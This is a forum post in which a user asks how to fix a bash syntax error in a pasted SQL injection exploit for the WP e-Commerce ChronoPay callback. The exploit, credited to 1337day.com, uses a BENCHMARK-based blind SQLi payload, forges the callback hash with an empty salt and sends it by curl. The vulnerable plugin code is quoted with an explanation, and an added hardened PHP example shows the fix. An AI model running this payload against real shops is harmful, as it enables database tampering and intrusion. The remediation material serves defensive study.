Post 302633473 by iiiiiiiiiii on Wednesday 2nd of May 2012 08:38:12 AM
Syntax error near unexpected token `('

What do I do here?

Code:
#!/bin/bash
payload=-1 AND 1=IF(21,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)#
hash=`echo -n $payload  md5sum  tr -d 'n'  sed 'ss-sg'  md5sum  tr -d 'n'  sed 'ss-sg'`
curl --data cs2=chronopay&cs1=$payload&cs3=$hash&transaction_type=rebill httpwww.[redacted].comchronopay_callback=true
 
---------------
Vulnerable code
---------------
./wp-e-commerce/wp-shopping-cart.php
 
    class WP_eCommerce {
 
        function WP_eCommerce() {
            add_action( 'plugins_loaded', array( $this, 'init' ), 8 );
        }
 
        function init() {
            ...
            $this->load();
            ...
        }
        function load() {
            ...
            wpsc_core_load_gateways();
            ...
        }
    ...
    $wpec = new WP_eCommerce();
 
 
./wp-e-commerce/wpsc-core/wpsc-functions.php
 
    function wpsc_core_load_gateways() {
        global $nzshpcrt_gateways, $num, $wpsc_gateways,$gateway_checkout_form_fields;
 
        $gateway_directory      = WPSC_FILE_PATH . '/wpsc-merchants';
        $nzshpcrt_merchant_list = wpsc_list_dir( $gateway_directory );
 
        $num = 0;
        foreach ( $nzshpcrt_merchant_list as $nzshpcrt_merchant ) {
            if ( stristr( $nzshpcrt_merchant, '.php' ) ) {
                require( WPSC_FILE_PATH . '/wpsc-merchants/' . $nzshpcrt_merchant );
            }
 
 
./wp-e-commerce/wpsc-merchants/chronopay.php
 
    function nzshpcrt_chronopay_callback()
    {
        ...
        if(isset($_GET['chronopay_callback']) && ($_GET['chronopay_callback'] == 'true') && ($_POST['cs2'] == 'chronopay'))
        {
            $salt = get_option('chronopay_salt');
             - this is by default '' and set only if explicitly stated
               inside Store Settings->Payments->General Settings->
               Chronopay->Edit->Security Key
             - problem is that there are more popular payment gateways enlisted (e.g.
               Google Checkout and PayPal) and if that setting is not explicitly set
               it wide opens the door to the potential attacker
 
            $gen_hash = md5($salt . md5($_POST['cs1'] . $salt));   
             
            if($gen_hash == $_POST['cs3'])
            {
                ...
                $sessionid = trim(stripslashes($_POST['cs1']));
                $transaction_id = trim(stripslashes($_POST['transaction_id']));
                $verification_data['trans_id'] = trim(stripslashes($_POST['transaction_id']));
                $verification_data['trans_type'] = trim(stripslashes($_POST['transaction_type']));
 
                switch($verification_data['trans_type'])
                {
                    ...
                    case 'rebill':
                        $wpdb->query("UPDATE `".WPSC_TABLE_PURCHASE_LOGS."` SET
                                            `processed` = '2',
                                            `transactid` = '".$transaction_id."',
                                            `date` = '".time()."'
                                        WHERE `sessionid` = ".$sessionid." LIMIT 1");
    ...
    add_action('init', 'nzshpcrt_chronopay_callback');


# 1337day.com [2011-09-13]

---------- Post updated at 07:38 AM ---------- Previous update was at 03:50 AM ----------

Anyone?
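
Added example, not part of the original post or of the plugin: a hardened form of the check and update shown in the quoted chronopay.php excerpt, written as stand-alone PHP. It refuses the callback when no security key is configured, compares the hash in constant time, and binds the values instead of concatenating them; in WordPress the binding step would go through `$wpdb->prepare()`. The function names, the `purchase_logs` table and the sample values are assumptions made for the demonstration.

```php
<?php
// Added example. Function names, table layout and sample values are hypothetical.

// True only when a non-empty shared secret is configured and cs3 matches it.
function callback_is_authentic(array $post, string $salt): bool {
    if ($salt === '') {
        return false; // no secret configured: anyone can compute the hash
    }
    if (!isset($post['cs1'], $post['cs3'])
        || !is_string($post['cs1']) || !is_string($post['cs3'])) {
        return false;
    }
    // Same construction as the plugin, compared without timing or type-juggling leaks.
    $expected = md5($salt . md5($post['cs1'] . $salt));
    return hash_equals($expected, $post['cs3']);
}

// Marks a purchase as processed using bound parameters instead of concatenation.
function mark_rebilled(PDO $db, string $sessionid, string $transaction_id): int {
    if (!ctype_digit($sessionid)) {
        return 0; // sessionid is treated as numeric here; reject anything else
    }
    $stmt = $db->prepare(
        'UPDATE purchase_logs SET processed = 2, transactid = :tid, date = :now
         WHERE sessionid = :sid'
    );
    $stmt->execute([':tid' => $transaction_id, ':now' => time(), ':sid' => $sessionid]);
    return $stmt->rowCount();
}

// Constructed demo data in an in-memory SQLite database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE purchase_logs (sessionid TEXT, processed INT, transactid TEXT, date INT)');
$db->exec("INSERT INTO purchase_logs VALUES ('1001', 1, '', 0)");

$salt    = 'constructed-demo-secret';
$genuine = ['cs1' => '1001', 'cs3' => md5($salt . md5('1001' . $salt)), 'transaction_id' => 'T-1'];
$forged  = ['cs1' => '1001', 'cs3' => md5(md5('1001'))]; // hash computed with an empty salt

var_dump(callback_is_authentic($genuine, $salt)); // request signed with the configured key
var_dump(callback_is_authentic($forged, $salt));  // request signed with no key
var_dump(callback_is_authentic($forged, ''));     // site with no key configured
if (callback_is_authentic($genuine, $salt)) {
    var_dump(mark_rebilled($db, $genuine['cs1'], $genuine['transaction_id']));
}
```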
 
